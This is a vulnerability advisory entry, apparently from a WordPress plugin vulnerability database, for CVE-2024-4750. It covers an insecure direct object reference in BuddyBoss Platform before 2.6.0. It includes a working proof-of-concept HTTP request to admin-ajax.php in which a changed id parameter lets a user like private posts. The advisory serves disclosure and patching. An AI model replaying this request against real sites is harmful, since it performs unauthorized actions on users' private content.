Lucene search
Faris KriviΔWPEX-ID:FFBE4034-842B-43B0-97D1-208811376DEAHistoryMay 14, 2024 - 12:00 a.m.
BuddyBoss Platform < 2.6.0 - Insecure Direct Object Reference on Like Comment
2024-05-1400:00:00
Faris KriviΔ
17
buddyboss platform
insecure direct object reference
like comment
exploit
update by may 28 2024
Description The plugin contains an IDOR vulnerability that allows a user to like a private post by manipulating the ID included in the request
POST /wp-admin/admin-ajax.php HTTP/2
Host: buddyboss.example.com
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://buddyboss.example.com/members/adele/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: https://buddyboss.example.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
scope=all&nonce=2081885524&action=activity_mark_fav&id=194628&modbypass=
By changing the id parameter it is possible to like arbitrary post.Related
cvelist
cvelist
nvd
nvd
CVE-2024-4750
2024-06-04 06:15:11
vulnrichment
vulnrichment
wpvulndb
wpvulndb
cve
cve
CVE-2024-4750
2024-06-04 06:15:11
6.5 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.0%
Related for WPEX-ID:FFBE4034-842B-43B0-97D1-208811376DEA